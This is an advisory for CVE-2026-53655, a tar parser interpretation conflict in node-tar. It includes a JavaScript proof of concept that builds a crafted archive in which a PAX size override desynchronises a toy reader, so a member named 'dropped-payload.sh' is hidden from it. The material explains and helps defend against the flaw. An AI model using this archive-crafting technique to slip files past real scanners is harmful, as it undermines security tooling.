Interpretation Conflict in node-tar - CVE-2026-53655

Published: June 26, 2026


Vulnerability identifier: #VU135505
CSH Severity: Low
CVSS v4.0: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/U:Clear
CVE-ID: CVE-2026-53655
CWE-ID: CWE-436
Exploitation vector: Remote access
Exploit availability: No public exploit available
Vendor: isaacs
Affected software:
node-tar

Detailed vulnerability description

The vulnerability allows a remote attacker to hide archive members from security tooling or downstream processing.

The vulnerability exists due to an interpretation conflict in Header.decode in node-tar's tar parser when it parses an attacker-supplied archive in which a PAX extended header (typeflag 'x') is placed before the intermediary GNU long-name ('L') or long-link ('K') headers that precede an entry. A remote attacker can supply a specially crafted archive to hide archive members from security tooling or downstream processing.

The issue occurs because PAX overrides such as size are applied to those intermediary metadata headers instead of being held for the entry they describe. The parser then reads the wrong number of bytes for the long-name or long-link data, loses its alignment with the 512-byte block stream, and from that point on interprets data blocks as headers (or headers as data). Because other tar implementations apply the overrides only to the real entry, the same archive yields a different list of members in node-tar than in those implementations, which is the CWE-436 condition: a member that one tool extracts can be invisible to a tool that scans the archive first.
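The desynchronisation described above, as an added illustration that is not part of this advisory and is not node-tar's code: a toy ustar writer plus a toy reader with a switch between the two readings of a PAX header placed before a GNU 'L' header. The sample archive, its member names, the 1024-byte size override and the "dropped-payload.sh" member are all constructed here; the reader's rules (PAX overrides held for the next real entry versus merged into whatever header comes next, and the first all-zero block ending the archive) are simplified models of the behaviour class the advisory describes, not node-tar's actual parser logic.

```javascript
// Added illustration, not node-tar's code: a toy ustar writer plus one toy reader
// that can be switched between two readings of a PAX header ('x') placed before
// a GNU long-name header ('L'). All member names and contents are made up here.
const BLOCK = 512;

const octal = (n, width) => n.toString(8).padStart(width - 1, '0') + '\0';

function header({ name, size, type }) {        // minimal ustar header block
  const h = Buffer.alloc(BLOCK, 0);
  h.write(name, 0, 100, 'latin1');
  h.write(octal(0o644, 8), 100, 'latin1');     // mode; uid/gid/mtime stay zero
  h.write(octal(size, 12), 124, 'latin1');
  h.write('        ', 148, 'latin1');          // checksum is computed over spaces
  h.write(type, 156, 'latin1');
  h.write('ustar', 257, 'latin1');
  h.write('00', 263, 'latin1');
  let sum = 0;
  for (const b of h) sum += b;
  h.write(sum.toString(8).padStart(6, '0') + '\0 ', 148, 'latin1');
  return h;
}

function padded(str) {                         // data NUL-padded to a block boundary
  const out = Buffer.alloc(Math.ceil(str.length / BLOCK) * BLOCK, 0);
  out.write(str, 0, 'latin1');
  return out;
}

function paxRecord(key, value) {               // "<len> <key>=<value>\n", len counts itself
  const body = ` ${key}=${value}\n`;
  let len = body.length + 1;
  while (String(len).length + body.length !== len) len++;
  return `${len}${body}`;
}

const readStr = (buf, off, len) => buf.toString('latin1', off, off + len).split('\0')[0];
const readOctal = (buf, off, len) => parseInt(readStr(buf, off, len).trim() || '0', 8);

function checksumOk(blk) {
  let sum = 0;
  for (let i = 0; i < BLOCK; i++) sum += (i >= 148 && i < 156) ? 0x20 : blk[i];
  return sum === readOctal(blk, 148, 8);
}

function parsePax(data) {                      // PAX records: "<len> <key>=<value>\n"
  const out = {};
  for (let s = data.toString('latin1'); s.length; ) {
    const sp = s.indexOf(' ');
    if (sp < 0) break;
    const len = parseInt(s.slice(0, sp), 10);
    const [key, ...val] = s.slice(sp + 1, len - 1).split('=');
    out[key] = val.join('=');
    s = s.slice(len);
  }
  return out;
}

// applyPaxToMeta=false: PAX overrides wait for the next real entry.
// applyPaxToMeta=true : overrides are merged into whatever header follows, the 'L'
//   header included, so its 'size' is taken as the long name's length (the desync
//   the advisory describes; 'K' long-link headers would be affected the same way).
function listMembers(archive, applyPaxToMeta) {
  const members = [];
  let pos = 0, pax = null, longName = null;
  while (pos + BLOCK <= archive.length) {
    const blk = archive.subarray(pos, pos + BLOCK);
    if (blk.every(b => b === 0)) break;        // toy rule: first zero block ends the archive
    if (!checksumOk(blk)) throw new Error(`no header at offset ${pos}`);
    const type = readStr(blk, 156, 1) || '0';
    const dataOff = pos + BLOCK;
    let size = readOctal(blk, 124, 12);
    if (type === 'x') {
      pax = parsePax(archive.subarray(dataOff, dataOff + size));
    } else if (type === 'L') {
      if (applyPaxToMeta && pax && pax.size !== undefined) {
        size = Number(pax.size);               // size meant for the next file, misapplied here
        pax = null;
      }
      longName = readStr(archive, dataOff, size);
    } else {
      if (pax && pax.size !== undefined) size = Number(pax.size);
      const name = (pax && pax.path) || longName || readStr(blk, 0, 100);
      members.push({ name, size, dataOffset: dataOff,
                     data: archive.subarray(dataOff, dataOff + size) });
      pax = null;
      longName = null;
    }
    pos = dataOff + Math.ceil(size / BLOCK) * BLOCK;
  }
  return members;
}

// Constructed sample: PAX size=1024 -> 'L' long name -> the member it describes.
// Blocks 5-6 are that member's 1024 bytes of data under the strict reading, but
// block 5 is a well-formed header and block 6 is all zeros, so a reader that
// misapplies the PAX size to the 'L' header lands on block 5 as the next header
// and stops at block 6, never reporting 'dropped-payload.sh' (blocks 7-8).
function buildArchive() {
  const longName = 'build/output/release-artifact.bin';
  const pax = paxRecord('size', '1024');
  const payload = 'echo this member is only seen by one of the two readers\n';
  return Buffer.concat([
    header({ name: 'PaxHeader/artifact', size: pax.length, type: 'x' }), padded(pax),         // 0-1
    header({ name: '././@LongLink', size: longName.length, type: 'L' }), padded(longName),    // 2-3
    header({ name: 'release-artifact.bin', size: 0, type: '0' }),                             // 4
    header({ name: 'release-artifact.bin', size: 0, type: '0' }),                             // 5
    Buffer.alloc(BLOCK),                                                                      // 6
    header({ name: 'dropped-payload.sh', size: payload.length, type: '0' }), padded(payload), // 7-8
    Buffer.alloc(2 * BLOCK),                                                                  // 9-10
  ]);
}

const sample = buildArchive();
const show = (ms) => ms.map(m => `${m.name} (${m.size} bytes at ${m.dataOffset})`);
console.log('strict reader:', show(listMembers(sample, false)));
console.log('loose reader :', show(listMembers(sample, true)));
```

Both readers accept the archive without error and agree on the first member's name, which is what makes the conflict useful to an attacker: the strict reader lists two members and treats blocks 5-6 as 1024 bytes of file data, while the loose reader lists one empty member and ends at block 6, so a scanner built on the loose reading never sees the member that an extractor built on the strict reading writes to disk.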


How to mitigate CVE-2026-53655

Install the security update from the vendor's website. Because the flaw is a disagreement between tar parsers rather than a crash, archive contents should be listed and extracted by the same patched implementation; scanning an archive with one parser and extracting it with another is exactly the gap this issue exploits.

Sources